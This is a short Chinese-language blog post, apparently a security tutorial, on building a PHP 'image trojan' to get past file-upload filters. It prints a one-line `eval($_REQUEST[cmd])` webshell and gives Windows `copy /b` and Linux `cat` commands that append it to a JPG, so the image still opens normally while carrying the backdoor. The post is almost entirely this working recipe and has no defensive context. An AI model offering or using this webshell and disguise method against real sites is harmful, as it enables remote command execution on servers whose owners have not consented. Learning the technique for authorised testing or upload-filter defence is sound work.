php图片马制作

发表于2023-05-28 | 更新于 2023-05-28 | kali 网安 windows

| 字数总计: 958 | 阅读时长: 1分钟 | 阅读量: 486

这篇文章距离最后更新已过356天,如果文章内容或图片资源失效，请留言反馈，我会及时处理，谢谢！

简介

图片马，顾名思义就是将图片和木马结合在一起。是文件上传漏洞重要的绕过方式。

先准备一张图片和一句话木马，木马如下：

<?php eval($_REQUEST[cmd]);?>

使用copy命令制作，copy可以将一个或多个文件进行复制拼接，生成一个新的目标文件。

copy 1.jpg /b + 1.php /a shell.jpg

/b表示以二进制格式复制文件，/a表示ASCII文本格式复制文件。看下图：
2023-05-28T12:53:34.png
shell.jpg图片可以正常显示。
2023-05-28T12:55:30.png
使用记事本打开图片，可以在末尾看到写入的一句话木马。

linux系统可以使用cat命令制作。同样准备图片和一句话木马。

cat 1.jpg 1.php >shell.jpg

同windows系统一样，图片显示正常，可以使用vim命令看到末尾有一句话木马，如下图：
2023-05-28T13:00:53.png
2023-05-28T13:01:50.png

作者: cultureSun

图片马

打赏